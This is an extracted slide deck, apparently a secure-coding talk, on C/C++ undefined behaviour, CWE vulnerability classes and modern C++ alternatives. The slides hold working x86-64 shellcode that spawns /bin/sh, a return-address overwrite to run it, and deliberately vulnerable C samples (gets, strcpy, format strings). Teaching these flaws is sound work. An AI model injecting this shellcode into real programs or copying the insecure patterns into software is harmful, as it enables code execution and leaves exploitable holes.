  • 39. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 39
  • 40. $
  • 41. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 41
  • 42. $ objdump -d shellcodeasm | grep main -C 20
  • 43. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 43
  • 44. char shellcode[] = "xebx17" // jmp push_string "x5f" // pop_string: pop %rdi "x48x31xd2" // xor %rdx, %rdx "x48x31xc0" // xor %rax, %rax "x48x89xe6" // mov %rsp, %rsi "x48x89x54x24x08" // mov %rdx, 8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // callq pop_string "/bin/sh"; @pati_gallardo 44
  • 45. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 45
  • 46. int main(void) { intptr_t *ret; ret = (intptr_t *) &ret + 2; (*ret) = (intptr_t) shellcode; } The Exploit: How to run your shell code @pati_gallardo 46
  • 47. Wat? What Happened to our Stack Overflow? @pati_gallardo 47
  • 48. Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 48
  • 49. Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49
  • 50. Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Instruction addresses also go toward higher addresses 50
  • 51. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 53. 1. Unsigned Integer Wraparound 2. Signed Integer Overflow 3. Numeric Truncation 4. Stack Buffer Overflow 5. Heap Buffer Overflow 6. Buffer Underflow 7. Use After Free 8. Double Free 9. Incorrect Type Conversion 10. Uncontrolled Format String @pati_gallardo
  • 54. Code is on GitHub: https://github.com/patricia-gallardo/insecure-coding-examples @pati_gallardo 54
  • 55. 1) Unsigned Integer Wraparound 2) Signed Integer Overflow 3) Numeric Truncation Error @pati_gallardo 55
  • 56. 1) CWE-190: Unsigned Integer Wraparound int main(void) { unsigned int first_len = UINT_MAX; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- sum == 255 memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT30-C. Ensure that unsigned integer operations do not wrap @pati_gallardo 56
  • 57. 2) CWE-190: Signed Integer Overflow int main(void) { int first_len = INT_MAX; int second_len = 256; int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- UB (negative) memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT32-C. Ensure that operations on signed integers do not result in @pati_gallardo 57
  • 58. 3) CWE-197: Numeric Truncation Error int main(void) { unsigned int first_len = UINT_MAX - 256; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; int new_len = (first_len+second_len); // IDB (negative) if(new_len <= 256) { memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT31-C. Ensure that integer conversions do not result in lost or misinterpreted data @pati_gallardo 58
  • 59. 4) Stack-based Buffer Overflow 5) Heap-based Buffer Overflow 6) Buffer Underwrite/Underflow @pati_gallardo 59
  • 60. 4) CWE-121: Stack-based Buffer Overflow int main(void) { char buffer[10]; // CWE-242: Inherently Dangerous Function gets(buffer); // <- Write outside } SEI-STR31-C. Guarantee that storage for str. has sufficient space for character data and the null terminator @pati_gallardo 60
  • 61. 5) CWE-122: Heap-based Buffer Overflow int main(int argc, char * argv[]) { char* buf = (char*)malloc(sizeof(char)*10); strcpy(buf, argv[1]); // <- Write outside free(buf); } SEI-ARR38-C. Guarantee that library functions do not form invalid pointers @pati_gallardo 61
  • 62. 6) CWE-124: Buffer Underwrite / Underflow int main(void) { char src[12]; strcpy(src, "Hello World"); size_t length = strlen(src); int index = (length -1); while (src[index] != ':') { src[index] = '0'; index--; } } SEI-ARR30-C. Do not form or use out-of-bounds pointers or array subscripts @pati_gallardo 62
  • 63. 7) Use After Free 8) Double Free @pati_gallardo 63
  • 64. 7) CWE-416: Use After Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] printf("%lun", strlen(buffer)); //Use after free } SEI-MEM30-C. Do not access freed memory @pati_gallardo 64
  • 65. 8) CWE-415: Double Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] free(buffer); // second free } SEI-MEM51-CPP. Properly deallocate dynamically allocated resources @pati_gallardo 65
  • 66. 9) Incorrect Type Conversion/Cast 10) Use of External Format String @pati_gallardo 66
  • 67. 9) CWE-704: Incorrect Type Conversion/Cast struct A {}; struct B {}; int main(void) { struct A * a = (struct A *) malloc (sizeof (struct A)); struct B * b = (struct B *) a; // cast to unrelated type } SEI-EXP05-CPP. Do not use C-style casts @pati_gallardo 67
  • 68. 10) CWE-134: Use of External Format String int main(int argc, char * argv[]) { char * format = argv[1]; char * str = argv[2]; printf(format, str); } $ ./format_string "%s %d" "Hello World" Hello World 1745066888 SEI-FIO47-C. Use valid format strings @pati_gallardo 68
  • 69. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 71. Classes of Tools - Several compilers - Warnings / Errors - Instrumentation - Static Analysis - Automated Tests - Fuzzing - Continuous Integration - Libraries @pati_gallardo 71
  • 72. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 73. The Eight I'd Really Rather You Didn'ts* *The Eight Condiments (Pastafarianism) @pati_gallardo 73
  • 74. Caution: Don’t take me too seriously. But seriously, think about it! *wink* @pati_gallardo 74
  • 75. The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 75
  • 76. 1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 76
  • 77. CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New @pati_gallardo 77
  • 78. 3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 78
  • 79. @pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input79
  • 80. 5. I'd Really Rather You Didn't: Use Pointers a Lot @pati_gallardo 80
  • 81. 6. I'd Really Rather You Didn't: Write “clever” code @pati_gallardo 81
  • 82. 7. I'd Really Rather You Didn't: Use shared_ptr a Lot @pati_gallardo 82
  • 83. 8. I'd Really Rather You Didn't: Share State a Lot @pati_gallardo 83
  • 84. T S P f . Patricia Aas, T S @pati_gallardo
  • 86. Expanding on Some of the points
  • 87. The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 87
  • 88. 1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 88
  • 89. Std::string - Concatenate Strings int main() { std::string first = "Hello "; std::string second = "World"; std::string buffer = first + second; std::cout << buffer << "n"; } @pati_gallardo 89
  • 90. Std::cout/cin : Using the Command Line int main(int argc, char * argv[]) { std::string second; std::cin >> second; std::string first = argv[1]; std::string buffer = first + second; std::cout << buffer << "n"; } $ ./command_line "Hello " World Hello World @pati_gallardo 90
  • 91. Algorithms : Strip after Colon int main() { string str = "Hello:World"; auto colon = [](int ch) { return ch == ':'; }; auto first = find_if(rbegin(str), rend(str), colon); str.erase(first.base(), end(str)); } @pati_gallardo 91
  • 92. C++ Casts : Safe Downcasting class Spiderman {}; class Ironman {}; int main() { Spiderman * peter = new Spiderman; Ironman * tony = static_cast<Ironman*>(peter); } inheritance.cpp:6:20: error: static_cast from 'Spiderman *' to 'Ironman *', which are not related by inheritance, is not allowed Ironman * tony = static_cast<Ironman*>(peter); ^~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1 error generated. @pati_gallardo 92
  • 93. CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New93 @pati_gallardo
  • 94. Allocating on the Stack #include "Hero.h" int main() { Hero h; } @pati_gallardo @pati_gallardo
  • 95. Where is it? Stack Hero stackHero; Heap unique_ptr<Hero> heapHero = make_unique<Hero>(); Hero * heapHero = new Hero(); @pati_gallardo @pati_gallardo
  • 96. Loving the Stack #include <iostream> #include <string> using namespace std; int main() { { string s("Hello World!"); cout << s; } // <- GC happens here! } @pati_gallardo @pati_gallardo
  • 97. Using the Stack To Manage Resource Lifetimes Destroyed when exiting scope Deterministic Garbage Collection @pati_gallardo
  • 98. Hold a Value on the Stack that Controls The Lifetime of Your Heap Allocated Object using namespace std; { unique_ptr<Hero> myHero = make_unique<Hero>(); shared_ptr<Hero> ourHero = make_shared<Hero>(); } Smart Pointers @pati_gallardo
  • 99. 3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 99
  • 100. Primitive types have no semantics, only limits Reduce the value space Keep it within defined behavior Enum class, string literals, user defined literals, size_t @pati_gallardo100
  • 101. Enum Class enum class Direction : char { NORTH = 'N', EAST = 'E', WEST = 'W', SOUTH = 'S' }; std::ostream& operator << (std::ostream& os, const Direction& obj) { os << static_cast<std::underlying_type<Direction>::type>(obj); return os; } int main() { std::cout << "t" << Direction::NORTH << "n" << "t" << Direction::EAST << "n" << "t" << Direction::WEST << "n" << "t" << Direction::SOUTH << "n"; } @pati_gallardo 101
  • 102. String Literals using namespace std::literals::string_literals; int main() { auto heroes = {"Spiderman"s, "Ironman"s, "Wonder Woman"s}; for(auto const & hero : heroes) { std::cout << "t" << hero << "n"; } } @pati_gallardo 102
  • 103. 1) User Defined Literals int main() { auto h = 24_hours; auto d = 7_days; auto err = h + d; } user_defined_literals.cpp:25:21: error: invalid operands to binary expression ('Hours' and 'Days') auto err = hours + days; ~~~~~ ^ ~~~~ 1 error generated. @pati_gallardo 103
  • 104. 2) User Defined Literals struct Hours { explicit Hours(unsigned long long n) : num(n) {} unsigned long long num = 0; }; struct Days { explicit Days(unsigned long long n) : num(n) {} unsigned long long num = 0; }; @pati_gallardo 104
  • 105. 3) User Defined Literals Hours operator "" _hours(unsigned long long num) { return Hours(num); } Days operator "" _days(unsigned long long num) { return Days(num); } @pati_gallardo 105
  • 106. Use Size_t for Sizes - Unsigned integer type - Result of the sizeof operator - Use for object sizes - Use for array indexing and loop counting @pati_gallardo 106
  • 107. @pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input107
  • 108. Taint - Is the source of this value in your code? - Command line args, size fields in headers, exported functions, APIs @pati_gallardo 108
  • 109. So… what should I remember from this presentation? @pati_gallardo 109
  • 110. Well, I'd Really Rather You Didn't: Use C @pati_gallardo 110
  • 111. Learn some Modern C++ Instead! @pati_gallardo 111
  • 112. Bjarne Stroustrup “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” @pati_gallardo 112
  • 113. Bjarne Stroustrup “Within C++, there is a much smaller and cleaner language struggling to get out.” @pati_gallardo 113